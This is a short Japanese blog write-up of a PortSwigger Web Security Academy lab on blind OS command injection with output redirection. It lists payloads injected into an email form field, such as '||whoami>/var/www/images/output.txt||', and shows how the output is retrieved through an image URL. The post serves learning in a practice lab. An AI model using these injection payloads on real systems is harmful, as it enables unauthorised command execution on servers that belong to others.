Shikata Ga Nai

Private? There is no such things.

Blind OS command injection with output redirectionをやってみた

Hello there, ('ω')ノ

 

出力リダイレクトを使用したブラインドOSコマンドインジェクションを。

ページからペイロードを入力しようとするとチェックが入るので。

 

f:id:ThisIsOne:20210226181903p:plain

 

リクエストをリピータへ。

 

f:id:ThisIsOne:20210226182023p:plain

 

スペースは、+に変換して。

まずは、下記のペイロードで動作確認するとエラーが。

 email=;ping+-c+10+127.0.0.1;

 

f:id:ThisIsOne:20210226182228p:plain

 

次に下記のペイロードをSendしてもエラーが。

 email=|ping+-c+10+127.0.0.1|

 

f:id:ThisIsOne:20210226182317p:plain

 

最後に下記のペイロードをSendすると成功したので。

 email=||ping+-c+10+127.0.0.1||

 

f:id:ThisIsOne:20210226182406p:plain

 

一旦、画像のあるディレクトリを確認して。

 

f:id:ThisIsOne:20210226182759p:plain

 

下記のURLでアクセスできるようなので。

  https://ac671f331f31294880db29b000210029.web-security-academy.net/image?filename=56.jpg

 

f:id:ThisIsOne:20210226183026p:plain

 

いよいよアウトプットするペイロードを。

 email=||whoami>/var/www/images/output.txt||

 

f:id:ThisIsOne:20210226182501p:plain

 

下記のURLでアウトプットファイルにアクセスして内容を確認して。

 https://ac671f331f31294880db29b000210029.web-security-academy.net/image?filename=output.txt

 

f:id:ThisIsOne:20210226183207p:plain

 

クリアできた。

 

f:id:ThisIsOne:20210226183233p:plain

 

Best regards, (^^ゞ